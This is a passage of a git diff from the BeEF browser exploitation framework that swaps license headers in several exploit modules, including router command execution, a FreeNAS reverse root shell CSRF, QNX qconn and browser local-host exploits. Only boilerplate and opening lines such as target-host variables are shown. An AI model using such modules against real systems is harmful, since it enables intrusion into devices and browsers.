-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/local_host/activex_command_execution/module.rb b/modules/exploits/local_host/activex_command_execution/module.rb
index c8dd70d8c..20e0915dc 100755
--- a/modules/exploits/local_host/activex_command_execution/module.rb
+++ b/modules/exploits/local_host/activex_command_execution/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Activex_command_execution < BeEF::Core::Command
 
diff --git a/modules/exploits/local_host/java_payload/command.js b/modules/exploits/local_host/java_payload/command.js
index 8ebcfcc28..f8938107f 100755
--- a/modules/exploits/local_host/java_payload/command.js
+++ b/modules/exploits/local_host/java_payload/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
     var conn = '<%= @conn %>';
diff --git a/modules/exploits/local_host/java_payload/config.yaml b/modules/exploits/local_host/java_payload/config.yaml
index 651dedb7b..47bb3370d 100755
--- a/modules/exploits/local_host/java_payload/config.yaml
+++ b/modules/exploits/local_host/java_payload/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/local_host/java_payload/module.rb b/modules/exploits/local_host/java_payload/module.rb
index bd0e902dc..5f83c6f18 100755
--- a/modules/exploits/local_host/java_payload/module.rb
+++ b/modules/exploits/local_host/java_payload/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Java_payload < BeEF::Core::Command
 
diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
index 758a5dea5..bbf2f434b 100644
--- a/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var result = "command sent";
diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
index 730bb4c79..97be87d19 100644
--- a/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
index d69389b9f..74f7874bd 100644
--- a/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # This module is a port of the same module from BeEF-0.4.0.0
 # It has not been tested
diff --git a/modules/exploits/local_host/safari_launch_app/command.js b/modules/exploits/local_host/safari_launch_app/command.js
index 91970c842..10b0fefb4 100755
--- a/modules/exploits/local_host/safari_launch_app/command.js
+++ b/modules/exploits/local_host/safari_launch_app/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
     var baseTag = document.createElement('base');
     baseTag.setAttribute('id', 'sla_<%= @command_id %>');
diff --git a/modules/exploits/local_host/safari_launch_app/config.yaml b/modules/exploits/local_host/safari_launch_app/config.yaml
index 13200a95d..9d68e8df5 100755
--- a/modules/exploits/local_host/safari_launch_app/config.yaml
+++ b/modules/exploits/local_host/safari_launch_app/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/local_host/safari_launch_app/module.rb b/modules/exploits/local_host/safari_launch_app/module.rb
index 50eb85b4a..2e3928be0 100755
--- a/modules/exploits/local_host/safari_launch_app/module.rb
+++ b/modules/exploits/local_host/safari_launch_app/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Safari_launch_app < BeEF::Core::Command
 
diff --git a/modules/exploits/local_host/window_mail_client_dos/command.js b/modules/exploits/local_host/window_mail_client_dos/command.js
index 38eebf375..cebf54b9c 100644
--- a/modules/exploits/local_host/window_mail_client_dos/command.js
+++ b/modules/exploits/local_host/window_mail_client_dos/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	// container iframe
diff --git a/modules/exploits/local_host/window_mail_client_dos/config.yaml b/modules/exploits/local_host/window_mail_client_dos/config.yaml
index 25a643768..bdb6cf69f 100644
--- a/modules/exploits/local_host/window_mail_client_dos/config.yaml
+++ b/modules/exploits/local_host/window_mail_client_dos/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/local_host/window_mail_client_dos/module.rb b/modules/exploits/local_host/window_mail_client_dos/module.rb
index d752b3e4b..64860d890 100644
--- a/modules/exploits/local_host/window_mail_client_dos/module.rb
+++ b/modules/exploits/local_host/window_mail_client_dos/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Windows_mail_client_dos < BeEF::Core::Command
   
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js b/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js
index 8df334d6c..560fd34e0 100644
--- a/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var rhost = '<%= @rhost %>'; 
   var rport = '<%= @rport %>';
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml b/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
index 6232339f5..e4074df92 100644
--- a/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 ################################################################################
 # For more information see: http://support.freenas.org/ticket/1788
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb b/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
index edc0805c5..ab9ffe2f4 100644
--- a/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 ################################################################################
 # For more information see: http://support.freenas.org/ticket/1788
diff --git a/modules/exploits/qnx_qconn_command_execution/command.js b/modules/exploits/qnx_qconn_command_execution/command.js
index 0313a3cbf..cffcf9489 100644
--- a/modules/exploits/qnx_qconn_command_execution/command.js
+++ b/modules/exploits/qnx_qconn_command_execution/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var rhost   = '<%= @rhost %>'; 
diff --git a/modules/exploits/qnx_qconn_command_execution/config.yaml b/modules/exploits/qnx_qconn_command_execution/config.yaml
index 4d52924e1..9b54ea8fa 100644
--- a/modules/exploits/qnx_qconn_command_execution/config.yaml
+++ b/modules/exploits/qnx_qconn_command_execution/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/qnx_qconn_command_execution/module.rb b/modules/exploits/qnx_qconn_command_execution/module.rb
index 896787c7a..3a9e14124 100644
--- a/modules/exploits/qnx_qconn_command_execution/module.rb
+++ b/modules/exploits/qnx_qconn_command_execution/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Qnx_qconn_command_execution < BeEF::Core::Command
 
diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/command.js b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js
index b8e6c556a..2c714f1c2 100644
--- a/modules/exploits/router/3com_officeconnect_cmd_exec/command.js
+++ b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var gateway = '<%= @base %>'; 
diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml b/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml
index 157669422..6dfcb5a88 100644
--- a/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml
+++ b/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb b/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb
index 675efdd36..b393df84c 100644
--- a/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb
+++ b/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Com_officeconnect_cmd_exec < BeEF::Core::Command
   
diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
index 4bf78dfec..3b2bd4cf8 100644
--- a/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
+++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var gateway = '<%= @base %>'; 
diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml b/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml
index 44c2ca602..27dd2f6c7 100644
--- a/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml
+++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb b/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb
index f330c301c..71d437a74 100644
--- a/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb
+++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Asmax_ar804gu_cmd_exec < BeEF::Core::Command
   
diff --git a/modules/exploits/router/bt_home_hub_csrf/command.js b/modules/exploits/router/bt_home_hub_csrf/command.js
index d20374dbe..a95814ee7 100644
--- a/modules/exploits/router/bt_home_hub_csrf/command.js
+++ b/modules/exploits/router/bt_home_hub_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd = '<%= @password %>';
diff --git a/modules/exploits/router/bt_home_hub_csrf/config.yaml b/modules/exploits/router/bt_home_hub_csrf/config.yaml
index 39034eba7..22f169ec0 100644
--- a/modules/exploits/router/bt_home_hub_csrf/config.yaml
+++ b/modules/exploits/router/bt_home_hub_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/bt_home_hub_csrf/module.rb b/modules/exploits/router/bt_home_hub_csrf/module.rb
index a63a69876..6f68fe9c8 100644
--- a/modules/exploits/router/bt_home_hub_csrf/module.rb
+++ b/modules/exploits/router/bt_home_hub_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Bt_home_hub_csrf < BeEF::Core::Command
   
